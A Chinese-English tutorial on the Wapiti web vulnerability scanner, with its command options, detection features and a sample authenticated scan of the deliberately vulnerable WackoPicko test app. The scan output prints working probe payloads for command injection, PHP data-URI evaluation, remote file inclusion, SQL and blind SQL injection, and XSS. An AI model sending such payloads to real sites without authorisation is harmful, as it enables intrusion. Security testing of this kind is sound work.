Wapiti web扫描工具使用——支持ssl,看官方示例报告就知道如何支持带cookie和用户名密码的扫描了

Wapiti 是一个基于命令行单Web漏洞扫描器,通过给目标站点发送 GET 和 POST 请求查找如下漏洞: (http://wapiti.sourceforge.net/):

  • File disclosure
  • 数据库注入
  • XSS (跨站脚本)
  • Command execution detection
  • CRLF injection
  • XXE (XML eXternal Entity) injection
  • Use of known potentially dangerous files
  • Weak .htaccess configurations that can be bypassed
  • 包含敏感信息的备份文件 (source code disclosure)

这篇文字,讨论如何利用 Wapiti 进行测试应用漏洞单发现和扫描报告的生成


  1. 命令行调用 Wapiti:


Usage: wapiti [options]

  -h, --help                                     显示此帮助消息并退出
  -u URL, --url URL                              定义扫描范围的基础URL 默认扫描范围是folder
  --scope {page, folder, domain, url, punk}      设置扫描范围
  -m MODULES_LIST, --module MODULES_LIST         加载模块列表
  --list-modules                                 列出Wapiti攻击模块并退出
  -l LEVEL, --level LEVEL                        设置攻击等级
  -p PROXY_URL, --proxy PROXY_URL                设置HTTP(S)代理 支持HTTP(S), SOCKS
  --tor                                          使用Tor监听器 (
  -a CREDENTIALS, --auth-cred CREDENTIALS        设置HTTP认证凭据
  --auth-type {basic, digest, kerberos, ntlm}    设置认证类型
  -c COOKIE_FILE, --cookie COOKIE_FILE           设置json格式的Cookie文件
  --skip-crawl                                   不恢复之前会话记录的扫描进程
  --resume-crawl                                 即使先前曾进行过某些已停止的攻击也可以恢复扫描进程
  --flush-attacks                                放弃当前会话的攻击历史和漏洞信息
  --flush-session                                放弃所有之前发现的当前目标的所有信息包括爬取的URL和漏洞等
  --store-session PATH                           存储攻击历史记录和会话数据的目录
  -s URL, --start URL                            添加起始扫描URL
  -x URL, --exclude URL                          添加要排除的URL
  -r PARAMETER, --remove PARAMETER               删除URL中的给定的参数
  --skip PARAMETER                               不攻击给定的参数
  -d DEPTH, --depth DEPTH                        设置扫描深度
  --max-links-per-page MAX                       设置扫描范围内每一页面提取的链接数
  --max-files-per-dir MAX                        设置每一目录探索的页面数
  --max-scan-time MINUTES                        设置扫描持续时间float分钟数
  --max-parameters MAX                           拥有超过最大输入参数的URL和表单在攻击前会被删除
  -S FORCE, --scan-force FORCE                   减少扫描和攻击的URL的简单办法 可选值: paranoid, sneaky, polite, normal, aggressive, insane
  -t SECONDS, --timeout SECONDS                  设置请求超时时间
  -H HEADER, --header HEADER                     设置每次请求的首部
  -A AGENT, --user-agent AGENT                   设置每次请求的User-Agent
  --verify-ssl {0, 1}                            是否检查SSL 默认不检查
  --color                                        使用颜色美化输出
  -v LEVEL, --verbose LEVEL                      设置详细度 (0: quiet, 1: normal, 2: verbose)
  -f FORMAT, --format FORMAT                     设置输出格式 支持: json, html(default), txt, openvas, vulneranet, xml
  -o OUPUT_PATH, --output OUPUT_PATH             输出文件或目录
  --external-endpoint EXTERNAL_ENDPOINT_URL      Url serving as endpoint for target
  --internal-endpoint INTERNAL_ENDPOINT_URL      Url serving as endpoint for attacker
  --endpoint ENDPOINT_URL                        Url serving as endpoint for both attacker and target
  --no-bugreport                                 当攻击模块失败时不发送Bug报告
  --version                                      打印程序版本号

What's new in Wapiti 3.0.3 ? Take a look here.

Wapiti can detect the following vulnerabilities :

  • File disclosure (Local and remote include/require, fopen, readfile...)
  • Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
  • XSS (Cross Site Scripting) injection (reflected and permanent)
  • Command Execution detection (eval(), system(), passtru()...)
  • CRLF Injection (HTTP Response Splitting, session fixation...)
  • XXE (XML External Entity) injection
  • SSRF (Server Side Request Forgery)
  • Use of know potentially dangerous files (thanks to the Nikto database)
  • Weak .htaccess configurations that can be bypassed
  • Presence of backup files giving sensitive information (source code disclosure)
  • Shellshock (aka Bash bug)
  • Open Redirects
  • Uncommon HTTP methods that can be allowed (PUT)

General features

  • Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
  • Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
  • Can give you colors in the terminal to highlight vulnerabilities.
  • Different levels of verbosity.
  • Fast and easy way to activate/deactivate attack modules.
  • Adding a payload can be as easy as adding a line to a text file.

Browsing features

  • Support HTTP, HTTPS and SOCKS5 proxies.
  • Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
  • Ability to restrain the scope of the scan (domain, folder, page, url).
  • Automatic removal of one or more parameters in URLs.
  • Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
  • Possibility to set the first URLs to explore (even if not in scope).
  • Can exclude some URLs of the scan and attacks (eg: logout URL).
  • Import of cookies (get them with the wapiti-getcookie tool).
  • Can activate / deactivate SSL certificates verification.
  • Extract URLs from Flash SWF files.
  • Try to extract URLs from javascript (very basic JS interpreter).
  • HTML5 aware (understand recent HTML tags).
  • Several options to control the crawler behavior and limits.
  • Skipping some parameter names during attack.
  • Setting a maximum time for the scan process.
  • Adding some custom HTTP headers or setting a custom User-Agent.





Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies
then use the generated cookie file to launch a Wapiti scan.

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json :

bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
        data: username=&password=

Enter a number : 1

Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

It can also be done with wapiti-getcookie this way (if you have all necessary informations about the form) :
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"

Then, I scan the vulnerable website using the cookie and excluding the logout script :

bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
    __      __               .__  __  .__________
   /  \    /  \_____  ______ |__|/  |_|__\_____  \ 
   \   \/\/   /\__  \ \____ \|  \   __\  | _(__  <
    \        /  / __ \|  |_> >  ||  | |  |/       \ 
     \__/\  /  (____  /   __/|__||__| |__/______  /
          \/        \/|__|                      \/

Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...

This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock

[*] Launching module exec
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded


[*] Launching module file
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded


[*] Launching module sql
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded


[*] Launching module xss
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
    GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/

[*] Launching module blindsql
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded


[*] Launching module permanentxss

A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.
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